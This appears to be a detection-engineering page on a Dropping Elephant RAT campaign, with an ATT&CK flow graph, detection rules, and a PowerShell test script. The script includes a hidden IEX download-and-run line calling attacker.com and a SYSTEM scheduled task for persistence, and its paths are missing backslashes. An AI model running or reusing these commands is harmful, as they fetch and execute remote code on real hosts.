Follow 
Detection stack
- AIDR
- Alert
- ETL
- Query
Summary
A sophisticated campaign attributed to Dropping Elephant uses China-themed decoy documents to deliver an updated, memory-resident remote access trojan. The intrusion relies on DLL sideloading through a legitimate Microsoft binary and the Donut shellcode loader to avoid disk-based detection. The final payload also uses advanced evasion methods, including control-flow flattening and runtime API reconstruction.
Investigation
Rapid7 researchers uncovered the threat during a proactive hunt that began with a malicious Windows shortcut masquerading as a PDF document. Their investigation followed the payload chain from initial staging on chinagreenenergy[.]org through DLL sideloading of APPWIZ.cpl to execution of an in-memory RAT. Code-level analysis with Diaphora confirmed a common lineage with earlier Dropping Elephant samples despite extensive reworking.
Mitigation
Defenders should prioritize behavioral detections, such as shortcut files launching PowerShell and suspicious payload staging in C:\Users\Public. Monitoring for scheduled tasks with unusual names and identifying DLL sideloading from unexpected directories is also important. In addition, endpoint defenses need memory-level visibility to catch tampering with AMSI, WLDP, and ETW.
Response
If this activity is detected, isolate affected systems immediately to disrupt further command-and-control traffic. Perform memory forensics to identify the injected RAT and inspect scheduled tasks for persistence. Network logs should also be reviewed for unauthorized HTTPS traffic to the known C2 domains and for any signs of file exfiltration.
graph TB %% Class Definitions Section classDef action fill:#99ccff classDef tool fill:#cccccc classDef malware fill:#ff9999 classDef process fill:#ccffcc classDef network fill:#ffff99 %% Node Definitions %% Initial Access and Execution action_user_exec[“<b>Action</b> – <b>T1204.002 User Execution: Malicious File</b><br/>Victim executes malicious shortcut file<br/><b>File</b>: GRES3001.lnk<br/><b>Disguise</b>: PDF icon”] class action_user_exec action action_icon_smuggling[“<b>Action</b> – <b>T1027.012 Obfuscated Files or Information: LNK Icon Smuggling</b><br/>Deceives user via icon manipulation<br/><b>Method</b>: LNK file icon spoofing”] class action_icon_smuggling action %% Downloader Phase process_conhost[“<b>Process</b> – <b>conhost.exe</b><br/>Host process for console windows<br/><b>Role</b>: Initiates PowerShell downloader”] class process_conhost process action_binary_padding[“<b>Action</b> – <b>T1027.001 Obfuscated Files or Information: Binary Padding</b><br/>Uses string-splitting obfuscation<br/><b>Target</b>: PowerShell downloader script”] class action_binary_padding action tool_downloader[“<b>Tool</b> – <b>PowerShell Downloader</b><br/>Retrieves decoy and malicious payloads<br/><b>Source</b>: chinagreenenergy[.]org”] class tool_downloader tool %% Post-Download and Persistence action_masquerading[“<b>Action</b> – <b>T1036.008 Masquerading: Masquerade File Type</b><br/>Renames files to look legitimate<br/><b>Directory</b>: C:\Users\Public\”] class action_masquerading action action_persistence[“<b>Action</b> – <b>T1546 Event Triggered Execution</b><br/>Ensures persistence via scheduled task<br/><b>Task Name</b>: GoogleErrorReport<br/><b>Interval</b>: Every minute”] class action_persistence action %% Execution Chain and Side-loading action_proxy_exec[“<b>Action</b> – <b>T1218.002 System Binary Proxy Execution: Control Panel</b><br/>Uses legitimate binary to execute loader<br/><b>Binary</b>: Fondue.exe”] class action_proxy_exec action tool_loader_cpl[“<b>Tool</b> – <b>APPWIZ.cpl</b><br/>Malicious Control Panel loader<br/><b>Method</b>: DLL Side-loading”] class tool_loader_cpl tool action_reflective_load[“<b>Action</b> – <b>T1620 Reflective Code Loading</b><br/>Maps code directly into memory<br/><b>Loader</b>: Donut shellcode loader”] class action_reflective_load action %% Post-Exploitation and C2 malware_rat[“<b>Malware</b> – <b>RAT</b><br/>Remote Access Trojan<br/><b>Status</b>: Resident in memory”] class malware_rat malware action_gather_info[“<b>Action</b> – <b>T1592 Gather Victim Host Information</b><br/>Collects system metadata<br/><b>Data</b>: Username, computer name, OS, IP”] class action_gather_info action action_c2[“<b>Action</b> – <b>TA0011 Command and Control</b><br/>Maintains communication via HTTPS<br/><b>Domain</b>: gcl-power[.]org”] class action_c2 action action_exfiltration[“<b>Action</b> – <b>Screen Capture and Exfiltration</b><br/>T1113 Screen Capture<br/><b>Goal</b>: Data theft”] class action_exfiltration action %% Connection Flow action_user_exec –>|leads_to| action_icon_smuggling action_icon_smuggling –>|triggers| process_conhost process_conhost –>|uses| action_binary_padding action_binary_padding –>|executes| tool_downloader tool_downloader –>|downloads_to| action_masquerading action_masquerading –>|sets_up| action_persistence action_persistence –>|triggers| action_proxy_exec action_proxy_exec –>|loads| tool_loader_cpl tool_loader_cpl –>|utilizes| action_reflective_load action_reflective_load –>|installs| malware_rat malware_rat –>|performs| action_gather_info malware_rat –>|establishes| action_c2 action_c2 –>|facilitates| action_exfiltration
Attack Flow
Detections
Possible IP Lookup Domain Communications Attempted (via dns)
View
Unusual Change Code Page Execution (via cmdline)
View
Suspicious Scheduled Task (via audit)
View
Suspicious Execution from Public User Profile (via process_creation)
View
Vcruntime140 Dynamic Library Loaded From Suspicious Directory (via image_load)
View
Suspicious Files in Public User Profile (via file_event)
View
Detection of Dropping Elephant’s Malware Campaign [Windows Network Connection]
View
Malicious DLL Side-Loading via Fondue.exe [Windows File Event]
View
Dropping Elephant Malware Campaign Detection via Shortcut and Side-Loading [Windows Process Creation]
View
Simulation Execution
Prerequisite: The Telemetry & Baseline Pre-flight Check must have passed.
Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic.
-
Attack Narrative & Commands: The adversary aims to establish persistence and execute a downloader. To bypass standard email filters, they use a shortcut file named
GRES3001.lnkthat appears as a PDF. When clicked, it callsconhost.exeto run a PowerShell script. Simultaneously, they establish persistence by creating a scheduled task namedGoogleErrorReportwhich is designed to runFondue.exefrom a public directory, masquerading as a legitimate Google error reporter to evade casual inspection. -
Regression Test Script:
# 1. Simulate the Shortcut/Conhost behavior # We simulate the execution of conhost.exe with the specific string in the command line Start-Process "conhost.exe" -ArgumentList "/c PowerShell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -Command IEX (New-Object Net.WebClient).DownloadString('http://attacker.com/payload.ps1')" # Note: To strictly match the rule's 'CommandLine contains GRES3001.lnk', we simulate the process call as if it came from that file. # Since we can't easily spoof the parent process name in a simple script, we simulate the command line string expected. Write-Host "[!] Simulating GRES3001.lnk trigger..." $SimulatedCmd = "conhost.exe /c GRES3001.lnk PowerShell.exe -Command Write-Host 'Malware Loaded'" # In a real environment, the 'CommandLine' field in Sysmon would contain the target string. # 2. Simulate the Scheduled Task and Fondue.exe side-loading Write-Host "[!] Simulating GoogleErrorReport scheduled task..." New-Item -Path "C:UsersPublicFondue.exe" -ItemType File -Force Set-Content -Path "C:UsersPublicFondue.exe" -Value "Dummy Payload" $TaskName = "GoogleErrorReport" $Action = New-ScheduledTaskAction -Execute "C:UsersPublicFondue.exe" Register-ScheduledTask -Action $Action -TaskName $TaskName -Description "Simulated Dropping Elephant Task" -User "SYSTEM" -Force Write-Host "[+] Simulation Complete. Check SIEM for alerts." -
Cleanup Commands:
# Remove the dummy malware binary Remove-Item -Path "C:UsersPublicFondue.exe" -Force # Remove the malicious scheduled task Unregister-ScheduledTask -TaskName "GoogleErrorReport" -Confirm:$false Write-Host "[+] Cleanup Complete."